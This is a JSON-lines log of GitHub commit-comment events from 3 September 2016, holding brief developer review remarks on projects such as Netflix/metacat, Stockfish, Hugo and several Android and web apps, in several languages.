{"id":"4512445212","type":"CommitCommentEvent","actor":{"login":"AnatoliyS"},"repo":{"name":"AnatoliyS/vk-java-sdk"},"payload":{"comment":{"id":18890564,"position":null,"line":null,"path":null,"commit_id":"27dbf365d191ea69a4daeb7a241aacae36f113c6","created_at":"2016-09-03T17:04:56Z","updated_at":"2016-09-03T17:04:56Z","body":"1) Убрал ненужные параметры запроса. С ними выводит ошибку, что данные параметры не указаны.\r\n2) Response class, очевидно, просто еще не успели добавить туда, где он должен быть, так как он в исходниках был, но не использовался.\r\n3) Ответ сервера Вконтакте на этот запрос не содержит response. Поэтому приходится как-то отдельно обрабатывать такую ситуацию в ApiRequest. Не знаю, есть ли другие запоросы, которые тоже не содержат response. Мне кажется, было бы более красиво с точки зрения архитектуры, чтобы все запросы содержали его. Но для этого нужно менять API. Для быстрого решения пролемы можно сделать хак, которые я написал (если нет response, то используем корневой елемент) но это, конечно, некрасивое решение. Был бы рад обсудить этот пункт :)"}},"created_at":"2016-09-03T17:04:56Z"}
{"id":"4512446629","type":"CommitCommentEvent","actor":{"login":"ajoymajumdar"},"repo":{"name":"Netflix/metacat"},"payload":{"comment":{"id":18890565,"position":48,"line":48,"path":"metacat-thrift/src/main/java/com/netflix/metacat/thrift/AbstractThriftServer.java","commit_id":"3e856f1cdfce3ad5b1f1b3bc0155f473f3165b0c","created_at":"2016-09-03T17:06:04Z","updated_at":"2016-09-03T17:06:04Z","body":"Make this an abstract method since this depends on the other method getServerEventHandler()"}},"created_at":"2016-09-03T17:06:04Z"}
{"id":"4512446729","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18890566,"position":null,"line":null,"path":null,"commit_id":"7248dfcfc8f6d0390f35acccef77a4c808a88717","created_at":"2016-09-03T17:06:09Z","updated_at":"2016-09-03T17:06:09Z","body":"Perhaps I should have compensated in the polynomial imbalance formula, but let's see..."}},"created_at":"2016-09-03T17:06:09Z"}
{"id":"4512448376","type":"CommitCommentEvent","actor":{"login":"icecreamassassin"},"repo":{"name":"icecreamassassin/OdysseyAct1"},"payload":{"comment":{"id":18890568,"position":null,"line":null,"path":null,"commit_id":"8d79a15a66fc344c275497b9fba9b3d6f8e0ffd0","created_at":"2016-09-03T17:07:19Z","updated_at":"2016-09-03T17:07:19Z","body":"Welcome to Odyssey Act 1 development. "}},"created_at":"2016-09-03T17:07:19Z"}
{"id":"4512449373","type":"CommitCommentEvent","actor":{"login":"mukherr1"},"repo":{"name":"mukherr1/tutorials"},"payload":{"comment":{"id":18890570,"position":null,"line":null,"path":null,"commit_id":"70292f452465638fcfd32cb6584eb9ebea4dc589","created_at":"2016-09-03T17:08:10Z","updated_at":"2016-09-03T17:08:10Z","body":"Deleted"}},"created_at":"2016-09-03T17:08:10Z"}
{"id":"4512451914","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"larshp/abaplint"},"payload":{"comment":{"id":18890576,"position":null,"line":null,"path":null,"commit_id":"3af39f4f839e3d883010036732b3f147788fe488","created_at":"2016-09-03T17:10:13Z","updated_at":"2016-09-03T17:10:13Z","body":"see https://github.com/larshp/abapGit/pull/313"}},"created_at":"2016-09-03T17:10:13Z"}
{"id":"4512452440","type":"CommitCommentEvent","actor":{"login":"adriaanm"},"repo":{"name":"adriaanm/community-builds"},"payload":{"comment":{"id":18890577,"position":null,"line":null,"path":null,"commit_id":"0e4abd29502c836283848f4f13fc2685ef2a45e5","created_at":"2016-09-03T17:10:34Z","updated_at":"2016-09-03T17:10:34Z","body":"I just went for zero diff to last observed green build.\nOn Sat, Sep 3, 2016 at 19:02 Seth Tisue <notifications@github.com> wrote:\n\n> Scalactic and ScalaTest 3.0 are both included these days. Did you see an\n> error that involved Scalactic?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/adriaanm/community-builds/commit/0e4abd29502c836283848f4f13fc2685ef2a45e5#commitcomment-18890561>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFjy0fauaiFjwrlry6SJy2Mg3bMkHLaks5qmagzgaJpZM4J0V_1>\n> .\n>\n"}},"created_at":"2016-09-03T17:10:34Z"}
{"id":"4512454152","type":"CommitCommentEvent","actor":{"login":"xiaofeng110"},"repo":{"name":"xiaofeng110/xiaofeng1"},"payload":{"comment":{"id":18890580,"position":null,"line":null,"path":null,"commit_id":"734f58219eb72c33b36597392f4b481a80651f84","created_at":"2016-09-03T17:11:54Z","updated_at":"2016-09-03T17:11:54Z","body":"hello 大家好"}},"created_at":"2016-09-03T17:11:54Z"}
{"id":"4512455758","type":"CommitCommentEvent","actor":{"login":"yons2016"},"repo":{"name":"yons2016/cliente"},"payload":{"comment":{"id":18890582,"position":null,"line":null,"path":null,"commit_id":"acead5d5b2a1802d57b584e9b96af3378b61c632","created_at":"2016-09-03T17:13:11Z","updated_at":"2016-09-03T17:13:11Z","body":"[Lan_Atheros_1.0.0.39_W7x86W7x64_A.zip](https://github.com/yons2016/cliente/files/453489/Lan_Atheros_1.0.0.39_W7x86W7x64_A.zip)\r\n"}},"created_at":"2016-09-03T17:13:11Z"}
{"id":"4512456518","type":"CommitCommentEvent","actor":{"login":"Moyster"},"repo":{"name":"m571-cm/android_device_meizu_m2note"},"payload":{"comment":{"id":18890585,"position":4,"line":69,"path":"system.prop","commit_id":"5dc699a92d31fda16bedddcaf137a4cd68da66ac","created_at":"2016-09-03T17:13:46Z","updated_at":"2016-09-03T17:13:46Z","body":"Is the kernel trick useless ? I couldn't find time to compile and flash"}},"created_at":"2016-09-03T17:13:46Z"}
{"id":"4512458653","type":"CommitCommentEvent","actor":{"login":"ajoymajumdar"},"repo":{"name":"Netflix/metacat"},"payload":{"comment":{"id":18890587,"position":64,"line":64,"path":"metacat-thrift/src/main/java/com/netflix/metacat/thrift/AbstractThriftServer.java","commit_id":"3e856f1cdfce3ad5b1f1b3bc0155f473f3165b0c","created_at":"2016-09-03T17:15:21Z","updated_at":"2016-09-03T17:15:21Z","body":"We need to set the limit for the pool. Also a queue size."}},"created_at":"2016-09-03T17:15:21Z"}
{"id":"4512458878","type":"CommitCommentEvent","actor":{"login":"kapilv9"},"repo":{"name":"kapilv9/Angularjs"},"payload":{"comment":{"id":18890588,"position":null,"line":null,"path":null,"commit_id":"268c151e3774e682730df5a1ad7531856a97cba2","created_at":"2016-09-03T17:15:28Z","updated_at":"2016-09-03T17:15:28Z","body":"The information should be displayed using media objects in a media list\r\nThe data is obtained through the controller from the corporateFactory\r\nImplemented the AboutController required for aboutus.html"}},"created_at":"2016-09-03T17:15:28Z"}
{"id":"4512459542","type":"CommitCommentEvent","actor":{"login":"yons2016"},"repo":{"name":"yons2016/cliente"},"payload":{"comment":{"id":18890589,"position":null,"line":null,"path":null,"commit_id":"acead5d5b2a1802d57b584e9b96af3378b61c632","created_at":"2016-09-03T17:15:57Z","updated_at":"2016-09-03T17:15:57Z","body":"za<sa<"}},"created_at":"2016-09-03T17:15:57Z"}
{"id":"4512460124","type":"CommitCommentEvent","actor":{"login":"abeja5"},"repo":{"name":"abeja5/datasciencecoursera"},"payload":{"comment":{"id":18890590,"position":null,"line":null,"path":null,"commit_id":"c4c9e5ad892faaa15526206c25e55b4acaf97642","created_at":"2016-09-03T17:16:21Z","updated_at":"2016-09-03T17:16:21Z","body":"This is a markdown file"}},"created_at":"2016-09-03T17:16:21Z"}
{"id":"4512461577","type":"CommitCommentEvent","actor":{"login":"bep"},"repo":{"name":"spf13/hugo"},"payload":{"comment":{"id":18890592,"position":14,"line":47,"path":"docs/content/content/organization.md","commit_id":"a48ac6e94514738ac9cc8f92cba89bd1f0c06a0c","created_at":"2016-09-03T17:17:34Z","updated_at":"2016-09-03T17:17:34Z","body":"Are you sure this URL is correct ref. the URL below?"}},"created_at":"2016-09-03T17:17:34Z"}
{"id":"4512461851","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890593,"position":209,"line":3808,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T17:17:48Z","updated_at":"2016-09-03T17:17:48Z","body":"Ok then we have to remember that."}},"created_at":"2016-09-03T17:17:48Z"}
{"id":"4512463096","type":"CommitCommentEvent","actor":{"login":"TGRHavoc"},"repo":{"name":"TGRHavoc/FMITAD"},"payload":{"comment":{"id":18890596,"position":null,"line":null,"path":null,"commit_id":"5c4b0b998b478b111a4076eac05e6771d6b6c47c","created_at":"2016-09-03T17:18:49Z","updated_at":"2016-09-03T17:18:49Z","body":"Fixes #1 "}},"created_at":"2016-09-03T17:18:49Z"}
{"id":"4512463650","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890597,"position":521,"line":4278,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T17:19:19Z","updated_at":"2016-09-03T17:19:19Z","body":"Missed that one. Thanks good find."}},"created_at":"2016-09-03T17:19:19Z"}
{"id":"4512464130","type":"CommitCommentEvent","actor":{"login":"ajoymajumdar"},"repo":{"name":"Netflix/metacat"},"payload":{"comment":{"id":18890598,"position":72,"line":52,"path":"metacat-thrift/src/main/java/com/netflix/metacat/thrift/CatalogThriftService.java","commit_id":"3e856f1cdfce3ad5b1f1b3bc0155f473f3165b0c","created_at":"2016-09-03T17:19:40Z","updated_at":"2016-09-03T17:19:40Z","body":"Please log and add metrics about the access information during processContext. "}},"created_at":"2016-09-03T17:19:40Z"}
{"id":"4512464325","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18890599,"position":null,"line":null,"path":null,"commit_id":"19fcb60baef6bc208372d9238edafa155c35602a","created_at":"2016-09-03T17:19:50Z","updated_at":"2016-09-03T17:19:50Z","body":"Awesome!\r\n\r\nI just realized I accidentally let a few `var`'s sneak in there, so give me a second to fix those.\r\n\r\nAlso, I have been working on the unit tests, just making a server and client in the same file is nothing easy."}},"created_at":"2016-09-03T17:19:50Z"}
{"id":"4512465802","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18890600,"position":36,"line":59,"path":"extmod/moduzlib.c","commit_id":"a6864a13c7e82e182e36dab8fb350fb2f7ece766","created_at":"2016-09-03T17:21:01Z","updated_at":"2016-09-03T17:21:01Z","body":"Yes. And before that, output processing can be optimized to be not 1-byte at time, but return larger chunks if currently available (e.g. if current symbol is dictionary, RLE, or verbatim input). Those are all optimizations though.\r\n"}},"created_at":"2016-09-03T17:21:01Z"}
{"id":"4512466673","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890602,"position":424,"line":4180,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T17:21:49Z","updated_at":"2016-09-03T17:21:49Z","body":"Its done now in EffectSummonType like in wotlk. I synced core."}},"created_at":"2016-09-03T17:21:49Z"}
{"id":"4512466724","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18890603,"position":null,"line":null,"path":null,"commit_id":"dff892f43e6f9a8c3f3580db60e362684d6c0033","created_at":"2016-09-03T17:21:51Z","updated_at":"2016-09-03T17:21:51Z","body":"My bad, did not mean to put that there"}},"created_at":"2016-09-03T17:21:51Z"}
{"id":"4512468006","type":"CommitCommentEvent","actor":{"login":"praseodym"},"repo":{"name":"WISVCH/wisvch-footer"},"payload":{"comment":{"id":18890604,"position":35,"line":35,"path":"wisvch-footer.html","commit_id":"b782341951d91b343f17721f8ed945eef324f475","created_at":"2016-09-03T17:22:57Z","updated_at":"2016-09-03T17:22:57Z","body":"Die `V` hoort hier niet"}},"created_at":"2016-09-03T17:22:57Z"}
{"id":"4512469174","type":"CommitCommentEvent","actor":{"login":"TimvdLippe"},"repo":{"name":"WISVCH/wisvch-footer"},"payload":{"comment":{"id":18890605,"position":35,"line":35,"path":"wisvch-footer.html","commit_id":"b782341951d91b343f17721f8ed945eef324f475","created_at":"2016-09-03T17:23:55Z","updated_at":"2016-09-03T17:23:55Z","body":"Ah good point. I actually copy-pasted from https://areafiftylan.nl/ so it is incorrect there. I will propose a PR to the lan site too so we only have to fix it in one place :tada: "}},"created_at":"2016-09-03T17:23:55Z"}
{"id":"4512469659","type":"CommitCommentEvent","actor":{"login":"Kurimizumi"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18890606,"position":null,"line":null,"path":null,"commit_id":"dff892f43e6f9a8c3f3580db60e362684d6c0033","created_at":"2016-09-03T17:24:19Z","updated_at":"2016-09-03T17:24:19Z","body":"No problem!\r\n\r\nYou saved me a lot of work, all I did was change a variable :+1: "}},"created_at":"2016-09-03T17:24:19Z"}
{"id":"4512470571","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":18890607,"position":null,"line":null,"path":null,"commit_id":"253f4b44605fc8d93dda61950a96dba2523405a8","created_at":"2016-09-03T17:25:00Z","updated_at":"2016-09-03T17:25:00Z","body":"Why checking for the type of box... is adding 179 in the devlist not sufficient?"}},"created_at":"2016-09-03T17:25:00Z"}
{"id":"4512470901","type":"CommitCommentEvent","actor":{"login":"Vampire"},"repo":{"name":"vivin/gradle-semantic-build-versioning"},"payload":{"comment":{"id":18890608,"position":null,"line":null,"path":null,"commit_id":"0dc0e185937c10680199fee0bfe9ca8da36d12f3","created_at":"2016-09-03T17:25:16Z","updated_at":"2016-09-03T17:25:16Z","body":"Maybe even the better one? It makes sure the version is configured early and you could e. g. stuff \"autobump\" in your gradle.properties file, having it applied automatically."}},"created_at":"2016-09-03T17:25:16Z"}
{"id":"4512471758","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":18890609,"position":5,"line":52,"path":"documentation/1.2/reference/operator/decrement.md","commit_id":"3e5feec526884106f656949f798ed4d8204759c3","created_at":"2016-09-03T17:26:00Z","updated_at":"2016-09-03T17:26:00Z","body":"You'd make a good lawyer, @lucaswerkmeister."}},"created_at":"2016-09-03T17:26:00Z"}
{"id":"4512472526","type":"CommitCommentEvent","actor":{"login":"YamaArashi"},"repo":{"name":"TwitchPlaysPokemon/pokeruby"},"payload":{"comment":{"id":18890610,"position":17,"line":21636,"path":"data/data2.s","commit_id":"da48d58ac29f53ced75c84924aa521f1424b50a2","created_at":"2016-09-03T17:26:37Z","updated_at":"2016-09-03T17:26:37Z","body":"why?"}},"created_at":"2016-09-03T17:26:37Z"}
{"id":"4512473868","type":"CommitCommentEvent","actor":{"login":"gilv"},"repo":{"name":"SparkTC/stocator"},"payload":{"comment":{"id":18890612,"position":59,"line":59,"path":"src/main/java/com/ibm/stocator/fs/swift/http/SwiftConnectionManager.java","commit_id":"1d513d66f137990abcaabb404abc53dc996e8f91","created_at":"2016-09-03T17:27:42Z","updated_at":"2016-09-03T17:27:42Z","body":"How to reproduce it? It did worked for me, but i want to run the same as you"}},"created_at":"2016-09-03T17:27:42Z"}
{"id":"4512474799","type":"CommitCommentEvent","actor":{"login":"gilv"},"repo":{"name":"SparkTC/stocator"},"payload":{"comment":{"id":18890613,"position":40,"line":40,"path":"src/main/java/com/ibm/stocator/fs/swift/http/SwiftConnectionManager.java","commit_id":"1d513d66f137990abcaabb404abc53dc996e8f91","created_at":"2016-09-03T17:28:25Z","updated_at":"2016-09-03T17:28:25Z","body":"I think it's ok. The retry count depends on ip route and so on.."}},"created_at":"2016-09-03T17:28:25Z"}
{"id":"4512476623","type":"CommitCommentEvent","actor":{"login":"Blurooo"},"repo":{"name":"Blurooo/H5Loading"},"payload":{"comment":{"id":18890614,"position":null,"line":null,"path":null,"commit_id":"af5918474720f46ca877576154b5c44d1e51eccd","created_at":"2016-09-03T17:30:03Z","updated_at":"2016-09-03T17:30:03Z","body":"重新压缩了一遍，大小为1.09k"}},"created_at":"2016-09-03T17:30:03Z"}
{"id":"4512478261","type":"CommitCommentEvent","actor":{"login":"aszczecinski"},"repo":{"name":"BartlomiejAdamiak/JavaApiDoGier"},"payload":{"comment":{"id":18890617,"position":null,"line":null,"path":null,"commit_id":"2913087fa43e0522c1c616f602bcdc646f172345","created_at":"2016-09-03T17:31:11Z","updated_at":"2016-09-03T17:31:11Z","body":"Brak dodanego private final static String API_URL_* do klasy HttpRiotClient, muszę zobaczyć głębiej, bo coś mi się wysypuje jak się bawie tam."}},"created_at":"2016-09-03T17:31:11Z"}
{"id":"4512479372","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890619,"position":null,"line":null,"path":null,"commit_id":"dffa0d062b4573ab31d9260d913acee134c5fc23","created_at":"2016-09-03T17:32:03Z","updated_at":"2016-09-03T17:32:03Z","body":"ja reichen vollkommen aus\r\naber wie kann man dann die jeweilige sprache auswählen?"}},"created_at":"2016-09-03T17:32:03Z"}
{"id":"4512479934","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890621,"position":null,"line":null,"path":null,"commit_id":"dffa0d062b4573ab31d9260d913acee134c5fc23","created_at":"2016-09-03T17:32:28Z","updated_at":"2016-09-03T17:32:28Z","body":"du musst dann auch die Toast beachten hinsichtlich der Sprachen"}},"created_at":"2016-09-03T17:32:28Z"}
{"id":"4512481491","type":"CommitCommentEvent","actor":{"login":"kaniini"},"repo":{"name":"charybdis-ircd/charybdis"},"payload":{"comment":{"id":18890624,"position":4,"line":94,"path":"modules/m_sasl.c","commit_id":"818a3fda944b26d4814132cee14cfda4ea4aa824","created_at":"2016-09-03T17:33:41Z","updated_at":"2016-09-03T17:33:41Z","body":"The first check is pointless imo."}},"created_at":"2016-09-03T17:33:41Z"}
{"id":"4512484249","type":"CommitCommentEvent","actor":{"login":"thomp"},"repo":{"name":"thomp/dired-launch"},"payload":{"comment":{"id":18890628,"position":null,"line":null,"path":null,"commit_id":"9afa143081014d081a4fd44a9dead23b797f7827","created_at":"2016-09-03T17:35:32Z","updated_at":"2016-09-03T17:35:32Z","body":"Does https://github.com/thomp/dired-launch/commit/9afa143081014d081a4fd44a9dead23b797f7827 work for you?"}},"created_at":"2016-09-03T17:35:32Z"}
{"id":"4512486976","type":"CommitCommentEvent","actor":{"login":"Marusya82"},"repo":{"name":"codepath-project-stories/timeline"},"payload":{"comment":{"id":18890630,"position":null,"line":null,"path":null,"commit_id":"5c68cc16a19df6b9118dda4cf7375953c748fe07","created_at":"2016-09-03T17:37:01Z","updated_at":"2016-09-03T17:37:01Z","body":"Why do we target version \"24\"? @leoliu1313 "}},"created_at":"2016-09-03T17:37:01Z"}
{"id":"4512487340","type":"CommitCommentEvent","actor":{"login":"andrepereiradasilva"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18890631,"position":5,"line":226,"path":"tests/unit/suites/libraries/joomla/JFactoryTest.php","commit_id":"133e4b6e232a5303b9f20eed83cc151cf728a4de","created_at":"2016-09-03T17:37:12Z","updated_at":"2016-09-03T17:37:12Z","body":"i see no problem since that change was meged in staging branch today\r\nhttps://github.com/joomla/joomla-cms/commit/8276f079fb4b53ed93776855d9985b9cff6b932d"}},"created_at":"2016-09-03T17:37:12Z"}
{"id":"4512490971","type":"CommitCommentEvent","actor":{"login":"jelhan"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":18890635,"position":null,"line":null,"path":null,"commit_id":"3cf26d722149f7605cab241065c0a40348444970","created_at":"2016-09-03T17:39:15Z","updated_at":"2016-09-03T17:39:15Z","body":"That's true for CSP spec but not for ember-cli-content-security-policy implementation. That's why I removed them from `.htaccess` but explicit that them in `config/environment.js`. \r\n\r\nBackground: ember-cli merges config objects provided by an addon with application ones. ember-cli-content-security policy includes `media-src` and `image-src` keys in [default config](https://github.com/rwjblue/ember-cli-content-security-policy/blob/master/index.js#L72-L80). Therefore we have to override them by 'none'."}},"created_at":"2016-09-03T17:39:15Z"}
{"id":"4512491845","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890637,"position":null,"line":null,"path":null,"commit_id":"dffa0d062b4573ab31d9260d913acee134c5fc23","created_at":"2016-09-03T17:39:44Z","updated_at":"2016-09-03T17:39:44Z","body":"ja der Toast-Text it ja auch in den strings, das passt so\r\n\r\nvllt kannst du das bei den Settings mit aufnehmen? Dass dann je nachdem was der Nutzer auswählt, eine andere Strings-Datei verwendet wird"}},"created_at":"2016-09-03T17:39:44Z"}
{"id":"4512491854","type":"CommitCommentEvent","actor":{"login":"mbskylian"},"repo":{"name":"m571-cm/android_device_meizu_m2note"},"payload":{"comment":{"id":18890638,"position":4,"line":69,"path":"system.prop","commit_id":"5dc699a92d31fda16bedddcaf137a4cd68da66ac","created_at":"2016-09-03T17:39:44Z","updated_at":"2016-09-03T17:39:44Z","body":"hi Moyster . if sync finished ，i will test it。 and you go to see your xda pm ,i send a post to you"}},"created_at":"2016-09-03T17:39:44Z"}
{"id":"4512492006","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18890639,"position":null,"line":null,"path":null,"commit_id":"5de9325dbb34a7d52080efe30b9c9950bb9cd979","created_at":"2016-09-03T17:39:49Z","updated_at":"2016-09-03T17:39:49Z","body":"We should probably make a dev fork, so if something breaks, we can reverse it before someone downloads a broken repo."}},"created_at":"2016-09-03T17:39:49Z"}
{"id":"4512495744","type":"CommitCommentEvent","actor":{"login":"ajoymajumdar"},"repo":{"name":"Netflix/metacat"},"payload":{"comment":{"id":18890641,"position":null,"line":null,"path":null,"commit_id":"3e856f1cdfce3ad5b1f1b3bc0155f473f3165b0c","created_at":"2016-09-03T17:42:14Z","updated_at":"2016-09-03T17:42:14Z","body":"Overall changes looks good. Please add the changes based on my comments. Also we should start creating pull request and merge it to the master only if it is reviewed. "}},"created_at":"2016-09-03T17:42:14Z"}
{"id":"4512496649","type":"CommitCommentEvent","actor":{"login":"ZIM555"},"repo":{"name":"ZIM555/android_device_samsung_fortunave3g"},"payload":{"comment":{"id":18890642,"position":null,"line":null,"path":null,"commit_id":"0195ef0fcde46ef8c4ef63c587d96eb291783d71","created_at":"2016-09-03T17:42:52Z","updated_at":"2016-09-03T17:42:52Z","body":"what you want know about fz variant?"}},"created_at":"2016-09-03T17:42:52Z"}
{"id":"4512496733","type":"CommitCommentEvent","actor":{"login":"daniele-GitHub"},"repo":{"name":"daniele-GitHub/hello-world"},"payload":{"comment":{"id":18890643,"position":null,"line":null,"path":null,"commit_id":"57dd79e53c37c8f6e35947788b8f357e0f2950e5","created_at":"2016-09-03T17:42:55Z","updated_at":"2016-09-03T17:42:55Z","body":"Just another comment"}},"created_at":"2016-09-03T17:42:55Z"}
{"id":"4512498895","type":"CommitCommentEvent","actor":{"login":"kinlane"},"repo":{"name":"dret/webconcepts"},"payload":{"comment":{"id":18890645,"position":null,"line":null,"path":null,"commit_id":"f17832df58071764f6407612ee827334efe7bd4f","created_at":"2016-09-03T17:44:32Z","updated_at":"2016-09-03T17:44:32Z","body":"It looks great sir! Actually better organized than mine was, making for an easy important and reuse on my end. I will start playing with some \"helper\" tooling to accompany it...not 100% sure where I\"m going with it...but I'd like to create Jekyll documentation / curriculum / etc, but also tools to demonstrate how it could be applied at design time in IDE, etc. Look forward to the specs one!"}},"created_at":"2016-09-03T17:44:32Z"}
{"id":"4512498997","type":"CommitCommentEvent","actor":{"login":"beck"},"repo":{"name":"kgardas/openbsd-src"},"payload":{"comment":{"id":18890646,"position":null,"line":null,"path":null,"commit_id":"e717de263adbeeba34723e6b21cf31b4237aa254","created_at":"2016-09-03T17:44:37Z","updated_at":"2016-09-03T17:44:37Z","body":"Who me? I'm guessing you meant someone else."}},"created_at":"2016-09-03T17:44:37Z"}
{"id":"4512501391","type":"CommitCommentEvent","actor":{"login":"Karkus476"},"repo":{"name":"brmbrmcar/wiki"},"payload":{"comment":{"id":18890650,"position":12,"line":11,"path":"Objects.md","commit_id":"846fb2a7f38c78a26726ba8b9eca61ff2fdda3d1","created_at":"2016-09-03T17:46:23Z","updated_at":"2016-09-03T17:46:23Z","body":"Can you please put the image after the name and before the description, with an empty line either side? This applies to all of the objects"}},"created_at":"2016-09-03T17:46:23Z"}
{"id":"4512501589","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18890651,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-03T17:46:30Z","updated_at":"2016-09-03T17:46:30Z","body":"Thanks, I'll study it. This condition:\r\nint(msb(pos.pieces(strongSide, PAWN))-lsb(pos.pieces(strongSide, PAWN))) & 7 < 3\r\nIs this supposed to be modulo 8? Right now can't parse and understand it."}},"created_at":"2016-09-03T17:46:30Z"}
{"id":"4512501921","type":"CommitCommentEvent","actor":{"login":"Kurimizumi"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18890652,"position":null,"line":null,"path":null,"commit_id":"5de9325dbb34a7d52080efe30b9c9950bb9cd979","created_at":"2016-09-03T17:46:46Z","updated_at":"2016-09-03T17:46:46Z","body":"Good idea, I'll go and make one now."}},"created_at":"2016-09-03T17:46:46Z"}
{"id":"4512503033","type":"CommitCommentEvent","actor":{"login":"Benardi"},"repo":{"name":"SILVAWesley/green-box"},"payload":{"comment":{"id":18890654,"position":null,"line":null,"path":null,"commit_id":"adf737ddf0125268716135e7b60e02a4e30cc7e4","created_at":"2016-09-03T17:47:32Z","updated_at":"2016-09-03T17:47:32Z","body":"Creation of new tests for *GFolder"}},"created_at":"2016-09-03T17:47:32Z"}
{"id":"4512504503","type":"CommitCommentEvent","actor":{"login":"dret"},"repo":{"name":"dret/webconcepts"},"payload":{"comment":{"id":18890655,"position":null,"line":null,"path":null,"commit_id":"f17832df58071764f6407612ee827334efe7bd4f","created_at":"2016-09-03T17:48:37Z","updated_at":"2016-09-03T17:48:37Z","body":"thanks for the feedback. if you run into *any* issues with the structure, let me know. currently, the cost of change is close to zero, so any feedback from an actual user is great! the spec one should be ready in a day or two... thanks for getting me going with this one!"}},"created_at":"2016-09-03T17:48:37Z"}
{"id":"4512507194","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890658,"position":null,"line":null,"path":null,"commit_id":"e44a4c5fc1e1a34fce43ef1db46fb125ebb6acb8","created_at":"2016-09-03T17:50:38Z","updated_at":"2016-09-03T17:50:38Z","body":"https://developers.facebook.com/docs/sharing/android\r\nda ist das glaub ich ganz gut erklärt, schau ich mir nachher mal an\r\n\r\nIch glaube das mit der Adresse wird zu aufwendig\r\n\r\nKönnen ja mal durch andere Apps stöbern, was da für den User so für Funktionen angeboten werden."}},"created_at":"2016-09-03T17:50:38Z"}
{"id":"4512508677","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18890660,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-03T17:51:54Z","updated_at":"2016-09-03T17:51:54Z","body":"Yes, `& 7` is basically the same as `% 8` here! Else you can have a look at pawn_span in git history (was used right here until a few weeks ago)..."}},"created_at":"2016-09-03T17:51:54Z"}
{"id":"4512509217","type":"CommitCommentEvent","actor":{"login":"Matt-F-Wu"},"repo":{"name":"Matt-F-Wu/GroceryRunnerNative"},"payload":{"comment":{"id":18890662,"position":null,"line":null,"path":null,"commit_id":"c0d4279712abbd2555a237c7213862c246154c32","created_at":"2016-09-03T17:52:21Z","updated_at":"2016-09-03T17:52:21Z","body":"Also fixed the issue where the user does not see his own request if the request is centered too far away using alternative location."}},"created_at":"2016-09-03T17:52:21Z"}
{"id":"4512509668","type":"CommitCommentEvent","actor":{"login":"Matt-F-Wu"},"repo":{"name":"Matt-F-Wu/GroceryRunnerNative"},"payload":{"comment":{"id":18890666,"position":null,"line":null,"path":null,"commit_id":"c0d4279712abbd2555a237c7213862c246154c32","created_at":"2016-09-03T17:52:45Z","updated_at":"2016-09-03T17:52:45Z","body":"Added show on map for addresses under profile"}},"created_at":"2016-09-03T17:52:45Z"}
{"id":"4512510237","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18890667,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-03T17:53:12Z","updated_at":"2016-09-03T17:53:12Z","body":"@lekma https://github.com/mstorsjo/fdk-aac bumped to version 0.1.5, this would also allow tvh to compile at gcc6+ (breaks at the moment due fdkaac)\r\n\r\nno idea if you like to include it or not"}},"created_at":"2016-09-03T17:53:12Z"}
{"id":"4512511052","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18890668,"position":null,"line":null,"path":null,"commit_id":"7248dfcfc8f6d0390f35acccef77a4c808a88717","created_at":"2016-09-03T17:53:55Z","updated_at":"2016-09-03T17:53:55Z","body":"Or a bonus for asymmetry..."}},"created_at":"2016-09-03T17:53:55Z"}
